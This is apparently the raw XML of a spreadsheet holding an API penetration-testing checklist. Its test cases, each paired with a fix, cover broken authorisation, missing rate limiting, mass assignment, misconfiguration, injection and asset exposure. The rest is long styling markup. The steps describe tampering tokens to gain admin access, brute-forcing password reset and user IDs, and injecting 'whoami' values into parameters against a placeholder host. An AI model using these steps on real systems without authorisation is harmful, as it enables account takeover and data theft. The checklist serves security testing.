3.Now try to decode access_token and if you get your user name try to tamper it as admin and encode it back.now again try same api call with tampered  access_token and check if we get response.note: Try to perform same action where ever we access api call using access_token or api_key</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access admin account or admin api calls.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/admin)
2.now in place of admin access token replace your access_token i.e users 
3.check if we are able to do admin api calls as normal user.</t>
  </si>
  <si>
    <t>5.Lack of resource sharing or no rate limiting</t>
  </si>
  <si>
    <t>lack of resource sharing or no rate limiting</t>
  </si>
  <si>
    <t>lack of rate limiting to password brute force</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.3.burpsuite is configured.
steps:
1.Access api documentation and get an api call to resert password for account.(ex:https://api.target.com/resetpassword)
2.send request to intruder and try to bruteforce for password.
</t>
  </si>
  <si>
    <t>There should be store implementation of rate limiting on sensitive actions</t>
  </si>
  <si>
    <t>lack of rate limiting to sensitive information disclosure</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.3.burpsuite is configured.
steps:
1.Access api documentation and get an api call to access your account.(ex:https://api.target.com/user/1)
2.send request to intruder and try to bruteforce user id i.e 1 and check if we are  able to disclose sensitive information of every user.
</t>
  </si>
  <si>
    <t>6.mass assignment</t>
  </si>
  <si>
    <t>Mass Assignment</t>
  </si>
  <si>
    <t>Assignment parameters without Security implementation</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access admin account or admin api calls.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/admin) access if you get 403 forbidden.
2.now try to change admin to administrator.
3.check if we are able to get admin details.</t>
  </si>
  <si>
    <t>proper security implementation need to set for every parameter</t>
  </si>
  <si>
    <t>mass Assignment</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access your account.( https://api.target.com/user_name=abc&amp;pass=1234)
2.now try injection attacks on user_name and password parameter if it wont work change parameters user_name as usr_name and password as pwd (ex: https://api.target.com/usr_name=whoami&amp;pwd=whoami)
3.check if we able to get username in server.</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and search for optional parameters.( https://api.target.com/user_name=abc&amp;pass=1234&amp;usr_id) consider usr_id is optional parameter in request.
2.now try injection attacks on optional parameter (ex: https://api.target.com/usr_name=abc&amp;pwd=1234&amp;usr_id=whoami)
3.check if we able to get username in server.</t>
  </si>
  <si>
    <t>7.Security Misconfiguration</t>
  </si>
  <si>
    <t>Security misconfiguration</t>
  </si>
  <si>
    <t>Security misconfiguration to admin access</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and search for admin api calls.( https://api.target.com/api/v2/admin)  browse https://api.target.com/api/v2/admin if we get 403 forbidden.
2.Now access same endpoint by changing version (ex:https://api.target.com/api/v1/admin) 
3.check if we able to get admin details. note: Try same calls for user end point too by changing user name or user id</t>
  </si>
  <si>
    <t>onces api version is updated try to disable older versions or implement  security to older versions too.</t>
  </si>
  <si>
    <t>Security misconfiguration to server details disclosure</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get any  api call.( https://api.target.com/api/v2/admin) in place of admin place any random string and browse https://api.target.com/api/v2/abcdefg if we get server details like verion software it is using.</t>
  </si>
  <si>
    <t>server details should not disclose over public</t>
  </si>
  <si>
    <t>8.Injections</t>
  </si>
  <si>
    <t>Injection attacks</t>
  </si>
  <si>
    <t>inproper input validation to injection attacks</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call .(ex: https://api.target.com/user_name=abc&amp;pass=1234)
2.now try injection attacks on user_name and password parameter if it wont work change parameters user_name as usr_name and password as pwd (ex: https://api.target.com/usr_name=whoami&amp;pwd=whoami)
3.check if we able to get username in server.note:Try every injection attacks in every api call i.e. sqli,host header,ssti,xml,os command injection.crlf</t>
  </si>
  <si>
    <t>There should be proper input validation need to set</t>
  </si>
  <si>
    <t>10.Improper asset management</t>
  </si>
  <si>
    <t>Improper asset management</t>
  </si>
  <si>
    <t>Improper asset management to sensitive information disclosure</t>
  </si>
  <si>
    <t>pre-condition:
1.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and search if there any developement calls are disclosued out side there network(i.e dev,test,branches,stag,staging)
2.check if there any sensitive details disclosued.
3.or dork for internal assets like "dev" "api.target.com" in browser and check if we get any sensitive details or internal api calls</t>
  </si>
  <si>
    <t>internal assets should not disclouse over public</t>
  </si>
  <si>
    <t>9.Insufficient Logging and monitoring</t>
  </si>
  <si>
    <t>Insufficient Logging and monitoring</t>
  </si>
  <si>
    <t>Sensitive details stored in local logs</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition:
1.applicable only for internal pentest or you have access to logs
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call for sensitive action like: email update,password update,user details update .(ex: https://api.target.com/user_name=abc&amp;newpass=1234)
2.check local logs any data we updated is preset in logs.
</t>
  </si>
  <si>
    <t>Sensitive details should not store in local logs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</si>
</sst>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color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF2118D8"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color rgb="FF808080"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color rgb="FF808080"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF006100"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF9C0006"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF7F7F7F"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF9C6500"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF00FF00"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF00FF00"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="1"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="1"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <charset val="1"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="17">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFBFBFBF"/>
        <bgColor rgb="FFC0C0C0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC0C0C0"/>
        <bgColor rgb="FFBFBFBF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC000"/>
        <bgColor rgb="FFFF9900"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA6A6A6"/>
        <bgColor rgb="FFACB9CA"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor rgb="FFFFFF00"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor rgb="FFEDEDED"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF0000"/>
        <bgColor rgb="FF9C0006"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFACB9CA"/>
        <bgColor rgb="FFBFBFBF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD6DCE4"/>
        <bgColor rgb="FFEDEDED"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7B7B7B"/>
        <bgColor rgb="FF7F7F7F"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>
        <bgColor rgb="FFD6DCE4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEDEDED"/>
        <bgColor rgb="FFFFFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC7CE"/>
        <bgColor rgb="FFD6DCE4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFEB9C"/>
        <bgColor rgb="FFEDEDED"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00FF00"/>
        <bgColor rgb="FF33CCCC"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="13">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color auto="1"/>
      </left>
      <right style="hair">
        <color auto="1"/>
      </right>
      <top style="hair">
        <color auto="1"/>
      </top>
      <bottom style="hair">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>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style="hair">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="hair">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="hair">
        <color rgb="FFFFC000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color rgb="FFFFC000"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color rgb="FFFFC000"/>
      </right>
      <top/>
      <bottom style="hair">
        <color rgb="FFFFC000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color rgb="FF5B9BD5"/>
      </left>
      <right style="hair">
        <color rgb="FF5B9BD5"/>
      </right>
      <top style="hair">
        <color rgb="FF5B9BD5"/>
      </top>
      <bottom style="medium">
        <color rgb="FF5B9BD5"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="22">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="15" fillId="3" borderId="1" applyProtection="0">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="8" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="14" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="15" fillId="3" borderId="1" applyProtection="0">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="17" fillId="12" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="10" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="11" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="13" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="20" fillId="15" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="8" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="27" fillId="16" borderId="0" applyBorder="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="121">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="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0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="7" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="7" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="7" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="7" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="4" borderId="1" xfId="7" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="7" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="1" xfId="9" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="7" borderId="1" xfId="7" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="7" borderId="1" xfId="9" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="7" borderId="1" xfId="9" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="1" xfId="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="10" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="3" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="3" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="8" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="5" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="8" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="8" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="7" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="2" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>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10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
